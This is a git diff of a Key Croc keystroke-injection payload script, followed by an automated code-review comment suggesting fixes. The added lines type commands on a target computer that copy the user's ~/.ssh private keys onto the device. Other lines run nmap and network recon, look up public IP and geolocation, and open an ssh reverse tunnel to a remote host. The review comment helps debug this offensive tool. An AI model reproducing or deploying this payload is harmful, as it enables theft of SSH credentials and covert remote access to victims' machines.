parent
55053ddffb
commit
19f2907265
|
@ -2,7 +2,7 @@
|
||||||
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
||||||
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
||||||
# Author: spywill
|
# Author: spywill
|
||||||
# Version: 4.1
|
# Version: 4.2
|
||||||
# Category: Key Croc
|
# Category: Key Croc
|
||||||
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
||||||
|
|
||||||
|
@ -17,6 +17,7 @@
|
||||||
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
|
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
|
||||||
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
|
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
|
||||||
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
||||||
|
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
|
||||||
|
|
||||||
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
||||||
QUACK LOCK
|
QUACK LOCK
|
||||||
|
@ -40,11 +41,14 @@ known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
|
||||||
recon=off
|
recon=off
|
||||||
recon_loot=/root/udisk/tools/Target_SSID.txt
|
recon_loot=/root/udisk/tools/Target_SSID.txt
|
||||||
|
|
||||||
#---> Edit Linux target password below
|
alert=off
|
||||||
|
alert_time=60
|
||||||
|
|
||||||
|
#---> Edit target password below
|
||||||
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
||||||
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
||||||
else
|
else
|
||||||
target_password=ENTER_LINUX_PASSWORD_HERE
|
target_password=ENTER_TARGET_PASSWORD_HERE
|
||||||
fi
|
fi
|
||||||
|
|
||||||
recon_scan() {
|
recon_scan() {
|
||||||
|
@ -53,10 +57,16 @@ recon_scan() {
|
||||||
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 2000
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||||
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 2000
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
else
|
else
|
||||||
:
|
:
|
||||||
fi
|
fi
|
||||||
|
@ -103,6 +113,14 @@ CLEAN_UP() {
|
||||||
fi
|
fi
|
||||||
}
|
}
|
||||||
|
|
||||||
|
calculate_network_range() {
|
||||||
|
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
|
||||||
|
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
||||||
|
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
|
||||||
|
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
|
||||||
|
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
|
||||||
|
}
|
||||||
|
|
||||||
case $LOOT in
|
case $LOOT in
|
||||||
getonline_W)
|
getonline_W)
|
||||||
ENTER_STORAGE
|
ENTER_STORAGE
|
||||||
|
@ -220,6 +238,22 @@ case $LOOT in
|
||||||
rm -f $recon_loot root/udisk/config.txt
|
rm -f $recon_loot root/udisk/config.txt
|
||||||
apt -y remove sshpass
|
apt -y remove sshpass
|
||||||
reboot --force
|
reboot --force
|
||||||
|
RESET_PAYLOAD
|
||||||
|
;;
|
||||||
|
getonline_T)
|
||||||
|
if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
|
||||||
|
if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
|
||||||
|
kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
|
||||||
|
fi
|
||||||
|
if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
|
||||||
|
kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
|
||||||
|
fi
|
||||||
|
killall -9 tcpdump
|
||||||
|
sleep 1
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
RESET_PAYLOAD
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
sleep 3
|
sleep 3
|
||||||
|
@ -292,18 +326,13 @@ if : >/dev/tcp/8.8.8.8/53; then
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
elif [ $option -eq 2 ]; then
|
elif [ $option -eq 2 ]; then
|
||||||
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
||||||
if [ ! $? = 0 ] || [ ! "$status" = installed ]; then
|
[ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass
|
||||||
apt -y install sshpass
|
|
||||||
else
|
|
||||||
:
|
|
||||||
fi
|
|
||||||
sleep 1
|
sleep 1
|
||||||
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||||
cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null
|
[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
||||||
rm -rf ~/.ssh 2>/dev/null
|
|
||||||
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
|
||||||
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
|
|
||||||
sleep 1
|
sleep 1
|
||||||
|
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
|
||||||
|
sleep 3
|
||||||
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
|
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
|
||||||
else
|
else
|
||||||
LED R
|
LED R
|
||||||
|
@ -324,10 +353,6 @@ else
|
||||||
LED R
|
LED R
|
||||||
fi
|
fi
|
||||||
|
|
||||||
sleep 3
|
|
||||||
LED OFF
|
|
||||||
QUACK UNLOCK
|
|
||||||
|
|
||||||
if [ "$recon" = "on" ]; then
|
if [ "$recon" = "on" ]; then
|
||||||
LED C SLOW
|
LED C SLOW
|
||||||
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
|
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
|
||||||
|
@ -337,28 +362,63 @@ if [ "$recon" = "on" ]; then
|
||||||
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
|
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
|
||||||
cat /etc/resolv.conf | grep nameserver >> $recon_loot
|
cat /etc/resolv.conf | grep nameserver >> $recon_loot
|
||||||
|
|
||||||
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
|
||||||
calculate_network_range() {
|
|
||||||
ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
|
||||||
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
|
||||||
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
|
|
||||||
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
|
|
||||||
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
|
|
||||||
echo "$network_range"
|
|
||||||
}
|
|
||||||
perform_nmap_scan() {
|
perform_nmap_scan() {
|
||||||
local network_range=$1
|
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
||||||
nmap -T4 -F $network_range >> $recon_loot
|
nmap -T4 -F $network_range >> $recon_loot
|
||||||
}
|
}
|
||||||
network_range=$(calculate_network_range)
|
calculate_network_range
|
||||||
perform_nmap_scan $network_range
|
perform_nmap_scan
|
||||||
|
|
||||||
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
|
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
|
||||||
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
|
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
|
||||||
echo -ne "\n\n" >> $recon_loot
|
echo -ne "\n\n" >> $recon_loot
|
||||||
LED OFF
|
|
||||||
elif [ "$recon" = "off" ]; then
|
elif [ "$recon" = "off" ]; then
|
||||||
:
|
:
|
||||||
else
|
else
|
||||||
:
|
:
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
if [ "$alert" = "on" ]; then
|
||||||
|
icmp_alert() {
|
||||||
|
calculate_network_range
|
||||||
|
sleep 1
|
||||||
|
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do
|
||||||
|
:
|
||||||
|
done
|
||||||
|
LED R SLOW
|
||||||
|
iptables -F
|
||||||
|
iptables -A OUTPUT -p icmp --icmp-type any -j DROP
|
||||||
|
sleep $alert_time
|
||||||
|
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
|
||||||
|
LED B ; sleep 2 ; LED OFF
|
||||||
|
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
|
||||||
|
}
|
||||||
|
port_alert() {
|
||||||
|
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
|
||||||
|
file=/tmp/tcpdump.out
|
||||||
|
until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
|
||||||
|
:
|
||||||
|
done
|
||||||
|
LED R SLOW
|
||||||
|
iptables -F
|
||||||
|
iptables -P INPUT DROP
|
||||||
|
iptables -P OUTPUT DROP
|
||||||
|
iptables -P FORWARD DROP
|
||||||
|
sleep $alert_time
|
||||||
|
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
|
||||||
|
LED B ; sleep 2 ; LED OFF
|
||||||
|
port_alert & echo -ne $! > /tmp/port_pid.txt
|
||||||
|
}
|
||||||
|
iptables-save > /root/udisk/tools/firewall-rules-backup.txt
|
||||||
|
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
|
||||||
|
port_alert & echo -ne $! > /tmp/port_pid.txt
|
||||||
|
LED B
|
||||||
|
elif [ "$alert" = "off" ]; then
|
||||||
|
:
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
|
||||||
|
sleep 3
|
||||||
|
LED OFF
|
||||||
|
QUACK UNLOCK
|
||||||
|
|
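Review bot: The new `getonline_T` branch (hunk `@ -220,6 +238,22`) kills the watcher processes but never restores the firewall, so a stop issued while `icmp_alert` or `port_alert` is inside its `sleep $alert_time` window leaves the flushed rules and the `DROP` policies in place indefinitely, because the `iptables-restore` that would undo them lives in the function that was just killed. Add `[ -f /root/udisk/tools/firewall-rules-backup.txt ] && iptables-restore < /root/udisk/tools/firewall-rules-backup.txt` after the `killall -9 tcpdump` line, and in the last hunk skip the unconditional `iptables-save > /root/udisk/tools/firewall-rules-backup.txt` when `/tmp/icmp_pid.txt` or `/tmp/port_pid.txt` still names a live process from an earlier run, since a re-run during an alert window snapshots the DROP state and later "restores" it. In the same branch the inner `if ps -p` tests merely repeat the outer condition and the `sed -n 1p` reads fail noisily when a pid file is absent, so test `[ -s /tmp/port_pid.txt ]` before reading and `rm -f` the pid files once the processes are gone. Separately, hunk `@ -17,6 +17,7` documents `getonline_T` as a MATCH word while the `MATCH (...)` alternation right below it is unchanged and does not list it, so — assuming MATCH is the only trigger for this payload — the stop command can never fire.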